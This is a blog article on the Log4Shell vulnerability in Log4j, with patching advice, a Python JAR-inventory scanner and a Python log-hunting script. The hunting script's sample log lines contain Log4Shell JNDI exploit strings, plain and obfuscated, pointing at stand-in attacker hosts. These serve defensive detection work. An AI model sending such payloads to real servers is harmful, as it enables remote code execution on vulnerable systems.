Why the Log4j Vulnerability Is Different and What Can Be Done
If you’re in the IT field, you’ve probably heard of the Log4j vulnerability (tracked as CVE-2021-44228 and widely called Log4Shell). It is one of the most widespread software vulnerabilities on record, and the ease with which it can be exploited is unusual. Log4j is a logging library for Java applications published by the Apache Software Foundation; despite the name, it is not part of the Apache HTTP Server. Vulnerable versions perform a JNDI lookup on attacker-controlled text that ends up in a log message, which lets the attacker load and run code of their choosing, and because Log4j is embedded in an enormous number of Java applications and appliances, it is everywhere.
Software bugs crop up all the time, so why is this one different?
The vulnerable component is found in almost every organization and across many product lines. We keep running into clients who assume they are safe because they don’t run Unix or Linux. The assumption is understandable but wrong: Log4j is a Java library, so it runs on Windows just as readily as on Linux, and it is bundled inside the software that vendors build, including appliances, agents and hosted services where the customer never sees the operating system at all. The list of products that embed Log4j is extensive and should be treated as a top priority by every organization. It is not an exaggeration to say that this vulnerability reaches an enormous number of devices and applications, from security cameras to hosted cloud services such as Salesforce.
If your company runs products from Adobe, Amazon, Cisco, Citrix, Symantec, Broadcom, Docker, FortiGuard, F-Secure, IBM, McAfee, Okta, Oracle, Red Hat, Siemens, SolarWinds, SonicWall, Sophos, Splunk, Trend Micro, VMware, Ubiquiti, Ubuntu or Zscaler, you might be vulnerable. This list is not exhaustive; it covers the most commonly encountered affected vendors. For some of them, such as VMware, almost every product in the lineup is affected, and the vendor has published manual workarounds that must be applied until patched builds are available. Most other vendors have only a few affected products, so check each vendor’s advisory to see exactly what is impacted.
What can be done?
Because Log4j lets an attacker run code of their choosing on the affected system, an attacker can plant malware, bots, web shells or new accounts. Once that has happened, whatever was planted keeps running after the vulnerability itself is patched. The normal way to handle a vulnerability is to apply the patches that vendors release, and that is certainly the case for Log4j as well, but patching closes the door without checking whether anyone already walked through it.
Things to consider:
The most effective preventive step is to apply vendor patches as they are released over the coming months, but on its own that is not enough. Where you control the application yourself, upgrade log4j-core to 2.17.1 or later (Apache also shipped fixed backports, 2.12.4 for Java 7 and 2.3.2 for Java 6). The early advice to set the log4j2.formatMsgNoLookups property turned out to be incomplete and is no longer considered a fix; where upgrading is impossible, removing the JndiLookup class from the log4j-core JAR is Apache’s documented mitigation.
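Vendor patches only cover the copies of Log4j the vendor knows about, so the first practical step on any host is an inventory of every log4j-core JAR on it, including ones buried inside WAR, EAR or fat JAR files. The script below is an added example written for this article, not code from the original post or from Apache. It walks a directory tree, opens every archive and every archive nested inside it, and gives each log4j-core it finds a verdict based on the manifest version and on whether the JndiLookup class is still present. It assumes the JAR manifest carries an Implementation-Version header, as Maven-built Log4j releases do, and treats 2.17.1 (or 2.12.4 and 2.3.2 on the backport branches) as the patched baseline, which also covers the follow-on issues CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. The sample tree it builds in demo() is constructed: empty placeholder entries laid out like real JARs, with names and versions chosen for illustration.

```python
"""Inventory a directory tree for log4j-core JARs hit by CVE-2021-44228 and its follow-ons.
Added example for this article, not code from the original post or from Apache. Assumptions:
the JAR manifest carries Implementation-Version (true of Maven-built Log4j releases), and the
patched baseline is 2.17.1, or 2.12.4 / 2.3.2 on the Java 7 / Java 6 backport branches.
"""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # Apache's mitigation deletes it
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
MAX_DEPTH = 3  # assumption: archives nested three deep covers typical deployments
FIXED = {(2, 12): (2, 12, 4), (2, 3): (2, 3, 2)}  # backport branches; every other branch needs 2.17.1


def parse_manifest(jar):
    """MANIFEST.MF headers as a dict (the headers used here are short, so no line continuation)."""
    try:
        raw = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return {}
    pairs = (line.partition(":") for line in raw.splitlines() if ":" in line)
    return {k.strip(): v.strip() for k, _, v in pairs}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text or "")
    return tuple(int(x or 0) for x in m.groups()) if m else None


def assess(location, version, jndi_present):
    """Verdict for one log4j-core archive, from its version and whether JndiLookup is still inside."""
    v = parse_version(version)
    if not jndi_present:
        verdict = "mitigated (JndiLookup.class removed)"
    elif v is None:
        verdict = "unknown version, JndiLookup present: review manually"
    else:
        verdict = "patched" if v >= FIXED.get(v[:2], (2, 17, 1)) else "VULNERABLE"
    return {"location": location, "version": version, "jndi_lookup": jndi_present, "verdict": verdict}


def scan_archive(source, label, results, depth=0):
    """Judge one archive (a path or file-like object), then recurse into archives it bundles."""
    try:
        jar = zipfile.ZipFile(source)
    except (zipfile.BadZipFile, OSError):
        return
    with jar:
        names = set(jar.namelist())
        mf = parse_manifest(jar)
        if JNDI_CLASS in names or "log4j core" in mf.get("Implementation-Title", "").lower():
            results.append(assess(label, mf.get("Implementation-Version"), JNDI_CLASS in names))
        if depth < MAX_DEPTH:
            for name in sorted(names):
                if name.lower().endswith(ARCHIVE_EXT):
                    scan_archive(io.BytesIO(jar.read(name)), f"{label}!{name}", results, depth + 1)


def scan_tree(root):
    """One record per log4j-core found under root, labelled by path relative to root."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                scan_archive(path, os.path.relpath(path, root), results)
    return results


def build_fixture(root):
    """Constructed sample tree, not real artifacts: zips laid out like log4j-core JARs with
    empty placeholder class entries, one of them packed inside a WAR, plus an unrelated JAR."""
    def make_jar(dest, version, with_jndi=True, title="Apache Log4j Core"):
        with zipfile.ZipFile(dest, "w") as z:
            mf = "Manifest-Version: 1.0\n"
            mf += f"Implementation-Title: {title}\n" if title else ""
            mf += f"Implementation-Version: {version}\n" if version else ""
            z.writestr("META-INF/MANIFEST.MF", mf)
            if with_jndi:
                z.writestr(JNDI_CLASS, b"")
    lib, webapps = os.path.join(root, "lib"), os.path.join(root, "webapps")
    for d in (lib, webapps):
        os.makedirs(d, exist_ok=True)
    make_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1")
    make_jar(os.path.join(lib, "log4j-core-2.14.1-stripped.jar"), "2.14.1", with_jndi=False)
    make_jar(os.path.join(lib, "shaded-app.jar"), None, title=None)  # vendor fat JAR, no version header
    make_jar(os.path.join(lib, "commons-io.jar"), "2.11", with_jndi=False, title="Commons IO")
    inner = io.BytesIO()  # a vulnerable core buried inside a web application archive
    make_jar(inner, "2.14.1", title=None)
    with zipfile.ZipFile(os.path.join(webapps, "app.war"), "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner.getvalue())


def demo():
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_fixture(root)
    return {r["location"]: r["verdict"] for r in scan_tree(root)}
```

On a real host, call scan_tree() on the application and vendor install directories (for example the web server’s webapps folder or an appliance’s lib directory) rather than demo(). A "mitigated" verdict only means the lookup class is gone; a stripped 2.14.1 still needs the vendor’s upgraded build when one ships, and a "patched" verdict says nothing about whether the host was already exploited before the patch landed.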
Because of that, there is a second step: hunt for signs of compromise on systems that were exposed before they were patched. Look for the ${jndi: lookup strings (and their obfuscated variants) in web and application logs, for outbound LDAP, RMI or DNS connections from servers that have no business making them, and for new processes, scheduled tasks or accounts that appeared after those requests. Finding the malware itself requires more than traditional antivirus; it requires what is referred to as next-gen EDR or next-gen antivirus. The experts at 5 Point are trained in these detection methods and can quickly identify whether your business is vulnerable or has already been exploited.
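As a worked example of this second step, here is the log hunting side of it, written for this article and not code from the original post or from 5 Point. The exploit string is a Log4j lookup of the form ${jndi:ldap://host/path}, and attackers hide it behind other lookups that Log4j resolves first, such as ${lower:j}, ${upper:J} or the ${env:X:-j} default-value syntax, and behind one or more layers of URL encoding. The script normalises those layers before matching and pulls out the callback host, which is what you then search for in firewall and DNS logs. The log lines are constructed samples in Apache access-log format; the addresses come from the TEST-NET-2 documentation range and the .example domain, and the regular expressions cover the obfuscations seen most often rather than every lookup Log4j supports.

```python
"""Hunt log lines for Log4Shell (CVE-2021-44228) lookup strings, including obfuscated ones.

Added example for this article, not code from the original post or from 5 Point. Log4j resolves
nested lookups before it sees "jndi", so attackers wrap the keyword in ${lower:j}, ${upper:J} or
the ${anything:-j} default-value form, and web clients also URL-encode the whole string. The
normaliser below peels those layers, then matches the canonical ${jndi:<scheme>://<host>...}.
"""
import re
from urllib.parse import unquote

_CASE_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${env:X:-j}, ${::-j}, ${sys:x:-j} ...
_JNDI = re.compile(r'\$\{jndi:([a-z]+)://([^/\s}]+)[^}\s"]*\}?', re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding and the innermost lookups repeatedly until nothing changes."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)  # each round strips one layer, so double encoding is handled too
        text = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), text)
        text = _DEFAULT_VALUE.sub(r"\1", text)
        if text == before:
            break
    return text


def find_jndi(line):
    """Return {'scheme', 'host', 'lookup'} for the first JNDI lookup in a line, or None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2), "lookup": m.group(0)}


def hunt(lines):
    """Apply find_jndi to every line; hits carry their 1-based line number."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append({"line": number, **found})
    return hits


# Constructed sample lines in Apache access-log format (TEST-NET-2 addresses, .example domains);
# lines 2-5 carry the exploit string in plain, case-lookup, default-value and URL-encoded forms,
# and lines 6-7 contain harmless ${...} text that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/b} HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 1024 "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.example:1099/c}" "-"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fx.evil.example%2Fd%7D HTTP/1.1" 200 10 "-" "-"',
    'app: rendering template ${user.name} for session 42',
    'app: ${env:CACHE_DIR:-/tmp} selected as cache directory',
]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['host']}  <- {hit['lookup']}")
```

A hit in a web log proves an attempt, not a successful exploit; the host it extracts is the pivot into the next check, which is whether the server actually opened a connection to that address on that port (LDAP 389/1389, RMI 1099, or a DNS query for the name). Remember that the string only needs to be logged somewhere, so headers such as User-Agent and X-Forwarded-For, form fields and even usernames are all places it arrives.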
Finally, this vulnerability also affects devices and systems that do not run a conventional operating system, and those need manual intervention where simple patching cannot reach. This is when an IT team must be extra vigilant. If the organization has many IoT devices, each must be checked individually, since such devices typically lack an automatic updater and can expose sensitive data if compromised, a particular concern in fields such as healthcare where connected devices are common.